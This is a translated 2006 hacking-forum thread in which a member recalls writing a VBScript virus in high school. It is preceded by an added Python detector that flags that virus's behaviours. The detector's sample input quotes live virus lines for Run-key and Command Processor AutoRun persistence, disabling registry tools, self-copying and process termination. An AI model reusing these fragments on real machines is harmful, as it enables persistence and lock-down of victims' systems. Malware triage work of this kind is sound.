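Added example, not part of the original post and not the script author's code: a small Python static-triage pass that flags the behaviours visible in the script above (WMI process termination, Run-key and Command Processor\AutoRun persistence, Policies lock-down, self-copy, hex-decoded dropper, Outlook mailing, mapped-share copying). The rule names, the functions and both sample inputs are constructed for illustration.

```python
import re

# Each rule: (id, meaning, regexes that must ALL match somewhere in the script).
# The patterns come from behaviours visible in the script posted above.
RULES = [
    ("kill-processes", "terminates processes by name through WMI",
     [r"Win32_Process", r"\.Terminate\s*\("]),
    ("run-key", "writes an autostart value under CurrentVersion\\Run",
     [r"RegWrite\b.*CurrentVersion\\Run\\"]),
    ("cmd-autorun", "hooks cmd.exe start-up via Command Processor\\AutoRun",
     [r"RegWrite\b.*Command Processor\\AutoRun"]),
    ("lock-tools", "disables registry tools or Explorer options via Policies",
     [r"RegWrite\b.*Policies\\.*(DisableRegistryTools|NoFolderOptions|NoAddRemovePrograms)"]),
    ("self-copy", "reads or copies its own script file",
     [r"WScript\.ScriptFullName", r"\.(Copy|ReadAll)\b"]),
    ("hex-dropper", "rebuilds a file from a hex string and runs it",
     [r'Chr\s*\(\s*"&h"\s*&\s*Mid\s*\(', r"\.run\b"]),
    ("outlook-mailer", "mails an attachment to address-book entries",
     [r"Outlook\.Application", r"AddressEntries", r"Attachments", r"\.Send\b"]),
    ("share-copy", "maps a network drive and copies files onto it",
     [r"mapnetworkdrive", r"copyfile"]),
]

def logical_lines(text):
    """Yield (first_line_no, text): ' _' continuations joined, whole-line comments dropped.
    String literals are kept, since a script can carry its logic as quoted text."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip()
        if start is None:
            start = no
        if line.endswith(" _"):          # VBScript line continuation
            buf += line[:-1]
            continue
        buf += line
        if not re.match(r"\s*(rem\b|')", buf, re.I):
            yield start, buf
        buf, start = "", None
    if buf:
        yield start, buf

def triage(text):
    """Return {rule_id: [line of first hit per pattern]} for every fully matched rule."""
    lines = list(logical_lines(text))
    hits = {}
    for rule_id, _meaning, patterns in RULES:
        found = []
        for pat in patterns:
            rx = re.compile(pat, re.I)   # VBScript identifiers are case-insensitive
            no = next((n for n, l in lines if rx.search(l)), None)
            if no is None:
                break
            found.append(no)
        else:
            hits[rule_id] = found
    return hits

def report(text):
    """Human-readable findings, one line per matched rule."""
    meaning = {r[0]: r[1] for r in RULES}
    return [f"{rid}: {meaning[rid]} (lines {nums})" for rid, nums in triage(text).items()]

# Constructed sample: a few lines quoted from the script above.
SAMPLE_SUSPECT = r'''Rem I like Virus!
Set k=fso.GetFile(WScript.ScriptFullName)
k.Copy(dir2&"\system.vbe")
ag.writeline "Set colProcessList = objWMIService.ExecQuery (""Select * from Win32_Process Where Name = '""&fa&""'"")"
ag.writeline "objProcess.Terminate()"
a.RegWrite kj&"Policies\System\DisableRegistryTools", "00000001", "REG_DWORD"
a.RegWrite "HKLM\Software\Microsoft\Command Processor\AutoRun", "%systemroot%\run.bat&system32.vbe", "REG_SZ"
a.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\system", dir1&"\windows.vbe"
'''

# Constructed benign sample: lists processes, names Outlook only in a comment.
SAMPLE_BENIGN = r'''Rem Inventory script; Outlook.Application and .Send appear only in this comment
Set svc = GetObject("winmgmts:\\.\root\cimv2")
For Each p In svc.ExecQuery("Select * from Win32_Process")
  WScript.Echo p.Name
Next
'''

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SUSPECT)) or "no findings")
    print("\n".join(report(SAMPLE_BENIGN)) or "no findings")
```

String literals are scanned on purpose, because the script above writes its process-killing loop into kill.vbe as quoted text. Files processed with Microsoft Script Encoder have to be decoded before text rules like these apply.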


I wrote this in high school; it was also the first time I felt the thrill of having written a virus.
http://tthacker.sitesled.com


Oh, the tone of the poster above seems to suggest.....
BLOG: http://blog.csdn.net/hkbyest


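Quote:
Quoting post #2 by sgl, posted 2006-01-16 19:18:
I wrote this in high school; it was also the first time I felt the thrill of having written a virus.
Haha, boss, so it was you who wrote it. Sorry about that, haha.
I'll edit your name in right away. I don't know whether that W.Z.T is another name of yours.
To be careful, I removed it for now and put in your current name, and, if you don't mind, I have written the source as 邪恶八进制, haha.
If you think it would be better submitted to the Original Works section, please send a private message or reply to this thread;
once I see it I will delete this post, and then you can submit it to the Original Works section, haha.

Or you can ask an administrator to delete it, haha.
Best wishes, big brother, for a lifetime of happiness.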

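The poster above is too polite, hehe. Actually W.Z.T is the abbreviation of my name, and tthacker is another alias; sgl is what I registered only after coming to 邪恶八进制, and it means "thin Gu Long" (瘦古龙). That seems rather long-winded~~~ This script virus really was written by me in high school. Back then I didn't know programming and could only cobble together a few destructive programs out of scripts. I only learned C after the college entrance exam, and then, based on that virus, I wrote a script virus generator, still with a DOS interface. That code can still be found in this board, though the programming technique is rather poor. By the way, there is also an article circulating online called "Thoughts on a Super Script Virus" (《对超级脚本病毒的构想》), which I also wrote. The three of them belong to one series; it is just that they were first reposted by 岁月联盟, which also changed the author's name. As for moving this to the Original Works section, never mind: first, the Original Works section wants works with relatively high technical content; second, script viruses are not very popular any more.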
http://tthacker.sitesled.com


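The article "Thoughts on a Super Script Virus" (《对超级脚本病毒的构想》) has already been reposted here, haha, with your forum name restored on it and the source given as 邪恶八进制.
Haha, I think it is quite interesting. Haha, you are too modest.
Address: http://www.eviloctal.com/forum/htm_data/32/0601/18492.html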